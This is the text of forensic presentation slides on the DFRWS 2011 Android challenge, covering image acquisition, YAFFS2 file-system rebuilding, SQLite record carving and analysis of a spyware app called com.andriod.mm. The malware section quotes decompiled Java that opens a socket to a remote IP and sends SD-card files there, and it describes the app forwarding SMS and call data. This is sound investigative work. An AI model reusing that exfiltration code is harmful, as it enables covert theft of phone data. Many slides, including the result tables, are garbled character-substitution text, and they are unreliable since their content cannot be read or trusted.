Titel Spreker

Turning Android inside out DFRWS 2011 Challenge

Ivo Pooters Fox-IT pooters@fox-it.com

Case description

•  Android phone 1: –  Donald Norby –  Dead – What happened?

•  Android phone 2: –  Yob Taog –  Data breach at SwiftLogic: IP leaked –  Guilty?

Data acquisition

•  SD card: regular imaging tools •  NAND contains multiple partitions:

– MTD mounted on /data – MTD mounted on /cache

•  Case 1: Root + DD used –  No OOB content! !

•  Case 2: Root + Nanddump used –  Cross-compile for ARM

The low hanging fruit

Norby’s data

•  9 PDF files in sdcard/download folder •  The PDF files contain schematics of

SwiftLogic •  From cache: carved HTML pages of Taog’s

social media pages and google searches

•  The cases are linked!

A relevant HTML file

On norby’s phone in cache partition

Nice, an IP-address Protected by htaccess !

Dir listing page of Apache

Hm!origin of the 9 PDF files?

FILE SYSTEM RECONSTRUCTION

Taog’s phone

!"#$%&'"()*&&+"&,-)".$"/)(0$(1"*"-)+#$('"2)*(34"5$#6"7%.".4)".$$&2"'$58."%5')(2.*5'"9:;;<=",1*>)2"

Rebuilding file system

•  Use mobile forensic toolkit (UFED,XRY) •  Use unyaffs2 (

http://code.google.com/p/yaffs2utils) –  Doesn’t work properly on ‘real’ images

•  Use Android emulator –  Extract files using adb

•  Rebuild Linux kernel with YAFFS2 support

YAFFS2 in linux

1.  Clean Ubuntu installation 2.  Get YAFFS2 source repository (

http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary)

3.  Patch it into the kernel 4.  Use NANDsim to simulate NAND device 5.  Use NANDwrite to write image to device

–  Don’t forget –r switch for OOB bytes –  Nandwrite –a –r /dev/mtdX ~/DFRWS/mtdX.dd

And presto Mount /dev/mtdblock0 /mnt/case2/data fox@server1104:/mnt/case2/data$ ls -l

total 27 drwxrwx--x 1 fox fox 2048 2011-05-05 04:06 anr drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 app drwxrwx--x 1 fox fox 2048 1970-01-01 01:02 app-private drwx------ 1 fox fox 2048 1970-01-01 01:02 backup -rw-rw-rw- 1 root root 8 2011-05-11 02:45 cc_data

drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 dalvik-cache drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 data drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found drwxrwx--t 1 fox 9998 2048 2011-05-11 02:45 misc

drwx------ 1 root root 2048 2011-05-10 22:43 property drwxrwxr-x 1 fox fox 2048 2011-05-11 02:42 system drwxr-xr-x 1 fox fox 2048 2011-05-07 18:50 tombstones

UID=1000, GID=1000

A suspicious application

•  Perform keyword search –  Phone numbers, names, other relevant terms

•  Hit on IP-address 50.56.29.109

•  /data/dalvik-cache/data@app@com.andriod.mm.apk@classes.dex

Hmm!

MALWARE ANALYSIS Taog’s phone

?4*.",2".4*."!@A*''()22"'$,5>",5".4,2"*//&,3*B$5CC"

Com.andriod.mm

•  Not in the Android market •  data/system/packages.xml

–  Installed on the evening that phone is bought •  Retrieve the APK for reverse engineering:

Data/apps/com.andriod.mm –  unzip it!

•  Convert dex (bytecode) to regular jar –  dex2jar

Analysis of androidManifest.xml

<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" /> [!] <receiver [!] android:name="com.andriod.mm.bootComp"> <intent-filter> <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" /> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.SCREEN_OFF" /> </intent-filter> </receiver> [!]

D2)":@E.$$&2"F3$')G>$$>&)G3$1H/H*5'($,'A*/-.$$&HI""

Permissions

Triggers

Analysis of java code

[…] private static final String DEFAULTHOST = "50.56.29.109"; private static final int DEFAULTPORT = 10001; […] int sendFile(String s){ […] socket = SocketFactory.getDefault().createSocket("50.56.29.109", 10001);

outputstream = socket.getOutputStream(); outputstream1.write(abyte2, k1, l1); […]

D2)"J'>%,"0$("')3$1/,&*B$5"FK*L*G')3$1/,&)(G0())G0(HCMNK'>%,I""

Apparently files are sent to this server

Analysis of java code (2) •  Secretly steals sd data:

–  On trigger, sd-card is scanned for files –  Files zipped and sent to 50.56.29.109: 10001

–  SMS “pkg uploaded” •  Monitor calls

–  SMS “Callin” + number + date/time •  Monitors received text messages and

forwards –  SMS “FORWARDED SMS from” + originating address

+ “ at” + date/time + “: ksms” + message

CARVING SQLITE RECORDS

Norby’s phone

O$#6"&).82")P*1,5)"O$(7+82"/4$5)"

Q)*')("R*.*"S"

R*.*"S" Q)*')("R*.*"

="

About YAFFS2 Out of band bytes

R*.*"S" Q)*')("

High fragmentation

Challenge

•  The user data and cache partition are YAFFS2 formatted.

•  Remember, we don’t have the OOB bytes –  File reconstruction is very difficult at least

•  Regular carving tools perform poorly

•  But we really want those sqlite records

SQLite format T$$."/*>)"

!5.)(,$("/*>)" !5.)(,$("/*>)" !5.)(,$("/*>)"

U)*0"/*>)"U)*0"/*>)"U)*0"/*>)"

U)*0"/*>)"U)*0"/*>)"

U)*0"/*>)"

@*>)"4)*')(" V)&&"/$,5.)("*((*+"

V)&&"3$5.)5."*()*"

D5*&&$3*.)'"*()*" offset Data records here!

Schema and SQLite signature stored here!

Pages not fragmented

The idea

1.  Identify SQLite pages from raw YAFFS2 image by page signature

2.  Parse out the records using the cell pointer array.

3.  Match the anonymous records against predefined templates. –  Analyze important SQLite databases for table

format

Results (Contacts) ,'" 5%17)(" '*.)HB1)"F%.3I" '%(*B$5" .+/)" 5*1)"

S" WWXY=ZW[Z\" ]^H]WH=]SS"SS_XS_]\"@`" XWS" a%." `("b"

=" WS=WZ=X\]=" ]^H]^H=]SS"S=_]W_]S":`" YS" a%."

X" WWXY=ZW[Z\" ]^H]^H=]SS"S=_X\_S[":`" SS^" a%." `("b"

W" WS=WZ=X\]=" ]^H]^H=]SS"]X_S\_XX"@`" \W" a%."

^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_WZ_=W"@`" X\S" !5" `("b"

!'" ',2/&*+"5*1)" )P.(*",50$"

S" `("b"• 1()c4%241*,&G3$1""• WWXAY=ZAW[Z\"• ̀ ("b"

=" d*$>" • d*$>"d*$>"• WS=WXYXX\\""

X" 1(")" • WWXY=ZW[Z\""• 1("

• 

Results (SMS) S^W" WS=WXYXX\\" ]^H]\H=]SS"]W_S=_SZ":`" S" ,5" -212Le#212_HH1)22*>)H/->"%/&$*')'f"S^W" WS=WXYXX\\" ]^H]\H=]SS"]W_S=_SZ":`" ]" ,5" -212Le#212_HH1)22*>)H/->"%/&$*')'f"

S^^" ]^H]\H=]SS"]W_SX_W\":`" S" '(*g" h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"

S^^" ]^H]\H=]SS"]^_XS_=\"@`" S" '(*g" h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"

S^^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_]^_XW"@`" S" /)5',5>" h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"

S^^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_]^_XW"@`" S" $%." h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"

S^Z" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_SZ_SW"@`" ]" ,5" 9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"')*&"5$#G"

S^Z" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_SZ_SW"@`" S" ,5" 9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"')*&"5$#G"

S^[" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_==_XY"@`" S" /)5',5>" !"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"

S^[" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_==_XY"@`" S" $%." !"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"

S^\" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_X]_SX"@`" ]" ,5" 9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"

S^\" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_X]_SX"@`" S" ,5" 9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"

S^Y" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_^Z_WW"@`" S" /)5',5>" !"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$(".4)")P34*5>)"

S^Y" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_^Z_WW"@`" S" $%." !"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$(".4)")P34*5>)"

Results (Browser) ,'" 4$2." %2)(5*1)" /*22#$('"

S" ^]G^ZG=YGS]Y" 5$(7+" ***222//"

!'" R*.)HB1)" d,.&)" DTU" j,2,.2"

XW" ]^H]ZH=]SS"]Z_=[_XZ"@`" +$7k.*$>"A"d#,l)("<)*(34" 4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>" S"

XW" ]^H]ZH=]SS"]Z_=[_XZ"@`" 4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>" S"

X^" ]^H]ZH=]SS"]Z_=[_W["@`" 4l/_HH1G.#,l)(G3$1H+$7k.*$>" S"

XZ" ]^H]ZH=]SS"]Z_=[_W["@`" d#,l)(" 4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>" S"

XZ" ]^H]ZH=]SS"]Z_=[_W["@`" 4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>" S"

X[" ]^H]ZH=]SS"]Z_=\_]Y"@`" d#,./,3"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)(" 4l/_HH.#,./,3G3$1HW.230Z" S"

X[" ]^H]ZH=]SS"]Z_=\_]Y"@`" 4l/_HH.#,./,3G3$1HW.230Z" S"

X\" ]^H]ZH=]SS"]Z_=\_=Z"@`" d#,./,3"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)(" 4l/_HH.#,./,3G3$1HW.L13%" S"

X\" ]^H]ZH=]SS"]Z_=\_=Z"@`" 4l/_HH.#,./,3G3$1HW.L13%" S"

SZ" ]^H]\H=]SS"]^_^\_XW"@`" 4l/_HH###G>$$>&)G3$1H1C2$%(3)N*5'($,'A4$1)" X"

XY" ]^H]\H=]SS"]^_^Y_=\"@`" 4l/_HH^]G^ZG=YGS]YH22H" S"

XY" ]^H]\H=]SS"]^_^Y_=\"@`" !5')P"$0"H22" 4l/_HH^]G^ZG=YGS]YH22H" S"

XY" ]^H]\H=]SS"]Z_=\_]^"@`" !5')P"$0"H22" 4l/_HH^]G^ZG=YGS]YH22H" ="

CONNECTING THE DOTS Conclusion

Creating the time line

•  Normalized all times to UTC time

•  Determine the timezone of each source

•  Analyst’s Notebook for timeline

Timeline

Timeline

Timeline

Conclusions/Reconstruction

•  Taog is victim of an attack •  Malware installed on his device at phone

shop before purchase •  The schematics of SwiftLogic were secretly

uploaded to the webportal •  Norby downloaded the schematics •  Norby tries to get more out of the deal •  …and get’s killed by mr E